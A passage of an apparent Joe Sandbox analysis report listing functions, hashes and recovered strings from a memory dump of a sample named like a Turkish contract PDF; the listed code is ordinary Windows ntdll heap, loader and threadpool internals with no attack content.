                              • Instruction ID: 9a951765c0b91db024ef60de53d98bedbd706295de2cc711df14fec436c4af95
                              • Opcode Fuzzy Hash: 81e0e7e02b6fa6cb2e7dd46345a9d16c6de22848945bcc1ab4e77783bf4ba851
                              • Instruction Fuzzy Hash: 58A19E759043399BEB24CF64CC84B99B3B9FF58318F1041EAD848A7265DB70AE81CF91
                              Function 32B963CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                              Download Yara Rule
                              Strings
                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32BF0DEC
                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32BF0EB5
                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32BF0E2F
                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32BF0E72
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                              • API String ID: 0-1468400865
                              • Opcode ID: 3bd2d3b2c35115e3dfdc000725238a9db34a22e16b4aeb595639dcdeea123312
                              • Instruction ID: 090845b39e2531e657094bbd05e2f91a995ecb0e09793609db7c83bfb3ce7457
                              • Opcode Fuzzy Hash: 3bd2d3b2c35115e3dfdc000725238a9db34a22e16b4aeb595639dcdeea123312
                              • Instruction Fuzzy Hash: D771EFB5908354AFE750CF54C884FCB7BA8EF867A4F440868FC488A25AD775E588CBD1
                              Function 32B890F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                              • API String ID: 2994545307-1391187441
                              • Opcode ID: 9dcb2c60b9b5ffb2cff5aed73ac1e2e644f5b7155113c07a645e06879aca3acd
                              • Instruction ID: 588172c9b2a9b7c2c7853446a76e2a2effb59fa3931f5a73896eb5035a337a68
                              • Opcode Fuzzy Hash: 9dcb2c60b9b5ffb2cff5aed73ac1e2e644f5b7155113c07a645e06879aca3acd
                              • Instruction Fuzzy Hash: 5D31B236905658FFDB01DB94DC84FAAB7B8FF45764F1040A1F929A7391DB70E980CA60
                              Function 32B97072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 03595be11a3fd2e2b20f019c63c5d74fc182c05a843e15b84348909c8dd93ca1
                              • Instruction ID: 2894fb9eebb4e886e3896a8c8c8d0d5a1752784c69fb68d31d9f49c93a9765b2
                              • Opcode Fuzzy Hash: 03595be11a3fd2e2b20f019c63c5d74fc182c05a843e15b84348909c8dd93ca1
                              • Instruction Fuzzy Hash: 055120B4A10725EFEB09CF64C884BADBBF4FF44755F10813AE802A7290DBB49955DB80
                              Function 32C23608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                              • API String ID: 0-1168191160
                              • Opcode ID: 9590ead14a75387a28c32074ba7a3c20dd7e91efa44d25217ea7529781835ef8
                              • Instruction ID: dbe13329a28486323d014e4851daeb3e36a2eba766e943d3bbf4a5d06abb50b4
                              • Opcode Fuzzy Hash: 9590ead14a75387a28c32074ba7a3c20dd7e91efa44d25217ea7529781835ef8
                              • Instruction Fuzzy Hash: 11F15CB5A003288FDF24DF18CD90B99B3B5AF84744F4440EAEA09A7241EF719E85CF59
                              Function 32B91380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                              Download Yara Rule
                              Strings
                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32B91648
                              • HEAP[%wZ]: , xrefs: 32B91632
                              • HEAP: , xrefs: 32B914B6
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                              • API String ID: 0-3178619729
                              • Opcode ID: f0ebab59a6d1cb5b32d354cf9f7f3fcfdbc651ad7859515aabcb3cb63f17585c
                              • Instruction ID: 306f4a9620b8ec570c77242b191e1524eb32c8116e4c1ea840e7d5cda5b32714
                              • Opcode Fuzzy Hash: f0ebab59a6d1cb5b32d354cf9f7f3fcfdbc651ad7859515aabcb3cb63f17585c
                              • Instruction Fuzzy Hash: 07E10074A143559BEB18CF28C481BBABBF1EF49744F14886DE896CB246EB34E940DB50
                              Function 32BBF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                              Download Yara Rule
                              Strings
                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 32C000C7
                              • RTL: Re-Waiting, xrefs: 32C00128
                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 32C000F1
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                              • API String ID: 0-2474120054
                              • Opcode ID: bacb0f906d1f7b6df4f3390734e2fa5309db71c32523c74e273197c4f9ef9258
                              • Instruction ID: 79c69fc325d9dccc18c66ba5cfcab56f1e7d28ca07331baa14a9ad6bf19b80fc
                              • Opcode Fuzzy Hash: bacb0f906d1f7b6df4f3390734e2fa5309db71c32523c74e273197c4f9ef9258
                              • Instruction Fuzzy Hash: 25E1CF746087419FEB15CF68C880B2AB7E0FF84358F104A5DF9A58B2E1DB75E945CB82
                              Function 32B8A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: FilterFullPath$UseFilter$\??\
                              • API String ID: 0-2779062949
                              • Opcode ID: 9afb4aa2907f87cb6acad6c5d3f0c8ad57a8376edfcf914b3242d31d73988e66
                              • Instruction ID: f57cd990545bbb9d09caf705400995789cbdffc2c453735e2d3d456be4d5f269
                              • Opcode Fuzzy Hash: 9afb4aa2907f87cb6acad6c5d3f0c8ad57a8376edfcf914b3242d31d73988e66
                              • Instruction Fuzzy Hash: 5DA16B759012699BDB21DF24CC88BEAB7B8EF48714F1005EAE90DA7250EB759EC4CF50
                              Function 32B9B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                              • API String ID: 0-373624363
                              • Opcode ID: ab42043d39ad5eeb86f347ae7dfb9d2e2fbd778022bb10de3c6ec7c1dba5aff7
                              • Instruction ID: 805e14ea116df800d730f9015a16912c9dfcdff6e90d8b4e8894063c04a484bc
                              • Opcode Fuzzy Hash: ab42043d39ad5eeb86f347ae7dfb9d2e2fbd778022bb10de3c6ec7c1dba5aff7
                              • Instruction Fuzzy Hash: 7491CD75A04369DBEB15CF54C460BEEB7B0FF45358F1481A9E800AB391DB79DA84CBA0
                              Function 32C6B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                              Download Yara Rule
                              Strings
                              • TargetNtPath, xrefs: 32C6B3AF
                              • GlobalizationUserSettings, xrefs: 32C6B3B4
                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 32C6B3AA
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                              • API String ID: 0-505981995
                              • Opcode ID: d4ed1c6ff2cf39d68c06862e0fe77d22156490415857ba1d4ac80e61a0de7cca
                              • Instruction ID: e06ac2ff00442881bc66a8f336fc266f99c785196243007945527ce4ba568079
                              • Opcode Fuzzy Hash: d4ed1c6ff2cf39d68c06862e0fe77d22156490415857ba1d4ac80e61a0de7cca
                              • Instruction Fuzzy Hash: AC618D72D41229ABDB219F54DC88FE9B7B8AB04718F4501E5EA08BB250DB749E85CF90
                              Function 32B8F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                              Download Yara Rule
                              Strings
                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 32BEE455
                              • HEAP[%wZ]: , xrefs: 32BEE435
                              • HEAP: , xrefs: 32BEE442
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                              • API String ID: 0-1340214556
                              • Opcode ID: 2a00558dca467f0cc814d5fe708dfbc202e20a617b0cf94ce8193ec7454f263a
                              • Instruction ID: 5438e6d099681b917f4daff065a915b7bb43c1b0b7174310c73e2935d989b5c0
                              • Opcode Fuzzy Hash: 2a00558dca467f0cc814d5fe708dfbc202e20a617b0cf94ce8193ec7454f263a
                              • Instruction Fuzzy Hash: 505135356047C4EFE312CBA4C884F9ABBF8FF04754F4440A5E9958B692DB74E940CBA0
                              Function 32C3D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                              Download Yara Rule
                              Strings
                              • HEAP[%wZ]: , xrefs: 32C3D792
                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 32C3D7B2
                              • HEAP: , xrefs: 32C3D79F
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                              • API String ID: 0-3815128232
                              • Opcode ID: 7f79fdeba4baf3e5c255289805f5e289dd8593a6afa71e6675818f116b31f2e6
                              • Instruction ID: b306d9ecee267efdad4bfc19dd2175a08a6139d4f48953f3388cb1ba3e040888
                              • Opcode Fuzzy Hash: 7f79fdeba4baf3e5c255289805f5e289dd8593a6afa71e6675818f116b31f2e6
                              • Instruction Fuzzy Hash: 0A5127791123508AF366CE2AC86077273F1EF86288F504C8DE6D5CB189DA3DD847DB60
                              Function 32BC15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                              Download Yara Rule
                              Strings
                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32C01943
                              • LdrpAllocateTls, xrefs: 32C0194A
                              • minkernel\ntdll\ldrtls.c, xrefs: 32C01954
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                              • API String ID: 0-4274184382
                              • Opcode ID: 0e04ba2448c4ec0e41f390670eedf597b1e3636152dc520c69d0e4b8deea8253
                              • Instruction ID: 56ba6f28cd6d1e64826e751bd7977b108bafb61fde7610231a877766440e0b5f
                              • Opcode Fuzzy Hash: 0e04ba2448c4ec0e41f390670eedf597b1e3636152dc520c69d0e4b8deea8253
                              • Instruction Fuzzy Hash: 704178B5A40615EFDB04CFA8CC40EAEBBB5FF48704F158629E805B7251DBB5A941CFA0
                              Function 32BC32C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                              Download Yara Rule
                              Strings
                              • RtlCreateActivationContext, xrefs: 32C02803
                              • Actx , xrefs: 32BC32CC
                              • SXS: %s() passed the empty activation context data, xrefs: 32C02808
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                              • API String ID: 0-859632880
                              • Opcode ID: 5392b0a80c31285bf4d01d1cd923f2de662376e3b486922b35670f278660bbe5
                              • Instruction ID: 408f7cda659d7ee83c6599d688dbc497695d5c2263be231706871958782af63b
                              • Opcode Fuzzy Hash: 5392b0a80c31285bf4d01d1cd923f2de662376e3b486922b35670f278660bbe5
                              • Instruction Fuzzy Hash: B33101766003159BEB05CE58D8D0F9A77A8EF84718F908469ED05DF282CF74E849CBE0
                              Function 32C1B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                              Download Yara Rule
                              Strings
                              • @, xrefs: 32C1B2F0
                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 32C1B2B2
                              • GlobalFlag, xrefs: 32C1B30F
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                              • API String ID: 0-4192008846
                              • Opcode ID: 1fcd66d64f59732c8ad4c47c114768e7f70e8e0b21838e7ea212f62b73415771
                              • Instruction ID: 894be4ab876bee05fdf73b3a45ae4c34652b9f1dcf5d948dd8ae0ed993a28953
                              • Opcode Fuzzy Hash: 1fcd66d64f59732c8ad4c47c114768e7f70e8e0b21838e7ea212f62b73415771
                              • Instruction Fuzzy Hash: 40314DB5D00209AEDB10DF94DC81FEEBBBCEF44744F8004A9E609E7141DB74AE449BA0
                              Function 32BD1190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                              Download Yara Rule
                              Strings
                              • @, xrefs: 32BD11C5
                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 32BD119B
                              • BuildLabEx, xrefs: 32BD122F
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                              • API String ID: 0-3051831665
                              • Opcode ID: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
                              • Instruction ID: c54fc9699938befcedc351476b247bd0099a7a8a5e3df8096ea56e053a3618ac
                              • Opcode Fuzzy Hash: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
                              • Instruction Fuzzy Hash: 4E318D72900219BBDB11CF95CC40FEFBBB9EB84B54F004025E954A72A0EB71DE05CBA0
                              Function 32B97623 Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07fe53b8bbbc2fc28f51f9bb3f6bbb573f0c6df93c358637b9b662c3f90b7746
                              • Instruction ID: f938f061931314378c2ef9649483ecd0a9c9235f0fd360076a95a0484ffae4cd
                              • Opcode Fuzzy Hash: 07fe53b8bbbc2fc28f51f9bb3f6bbb573f0c6df93c358637b9b662c3f90b7746
                              • Instruction Fuzzy Hash: 0D617CB5A00616AFDB08CF68C880B9DFBF5FF88744F24826AD419A7310DB75A951DB90
                              Function 32BA51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$@
                              • API String ID: 0-149943524
                              • Opcode ID: 80bdc55062b4075a9d2f1f56c00d14925251fa2d51b59cd090115ef6a5f9a8e9
                              • Instruction ID: c9c03280448470041b4fb827430b172ffb6b6ec15eb250f11c7387a03f0c2905
                              • Opcode Fuzzy Hash: 80bdc55062b4075a9d2f1f56c00d14925251fa2d51b59cd090115ef6a5f9a8e9
                              • Instruction Fuzzy Hash: 6232D1B49083619FD724CF18C4A0B2EB7F1EF88748F50492EF99597290EB75DA84CB52
                              Function 32B95622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 95d09230b07a4b95d5164e7edbfd4d1024ee068e46685c0dbf14836d34dfa36c
                              • Instruction ID: d2ef8df344b83ab502db800321e0365ba356cc4359cd37347e6694ae1c5a33d1
                              • Opcode Fuzzy Hash: 95d09230b07a4b95d5164e7edbfd4d1024ee068e46685c0dbf14836d34dfa36c
                              • Instruction Fuzzy Hash: C231CF35245B22BFEB459F64C980FDAFBA5FF84754F404125E94087A60EBB1E821CBD0
                              Function 32C0E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: Legacy$UEFI
                              • API String ID: 2994545307-634100481
                              • Opcode ID: e6cf26462a0c27c584d822c5bce439678e6b1be770051b38004a45851a4c3d27
                              • Instruction ID: db1d7b361882350ab703b33df209a1c7a0f96e11e7aa702fbdd9bcbf9bc9e884
                              • Opcode Fuzzy Hash: e6cf26462a0c27c584d822c5bce439678e6b1be770051b38004a45851a4c3d27
                              • Instruction Fuzzy Hash: 79615CB2A407089FDB14CFA9C850BADB7B8FF48744F54846AE549EB251EB70D940CFA0
                              Function 32BAF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: $$$
                              • API String ID: 3446177414-233714265
                              • Opcode ID: 7040a40de78a8054779c7cf02475bb7a7ad048f58ba21d77e9abe3652713a4a3
                              • Instruction ID: d0e2ba48e61540c517f7507e64bee066d8edf5a27390facbbcae0ac316c4d221
                              • Opcode Fuzzy Hash: 7040a40de78a8054779c7cf02475bb7a7ad048f58ba21d77e9abe3652713a4a3
                              • Instruction Fuzzy Hash: 4561EDB5A09749DFEB20CFA8C5A0FEDB7B1FF04708F108429D5046B680DBB6A941CB90
                              Function 32B9A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                              Download Yara Rule
                              Strings
                              • RtlpResUltimateFallbackInfo Enter, xrefs: 32B9A21B
                              • RtlpResUltimateFallbackInfo Exit, xrefs: 32B9A229
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                              • API String ID: 0-2876891731
                              • Opcode ID: 886697fe578f5cdfd64a232e35bfbda126e5aadcac8854f0e4185314deb897b5
                              • Instruction ID: 8d4e2d173b09eef30afaef64a673d766b2af7def1d05d51b911b3e0f40368ef8
                              • Opcode Fuzzy Hash: 886697fe578f5cdfd64a232e35bfbda126e5aadcac8854f0e4185314deb897b5
                              • Instruction Fuzzy Hash: C441BE74600754EBEB05CF59C850B99B7B4FF85748F2080B5ED84DF2A1EA76D940CB10
                              Function 32C2314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
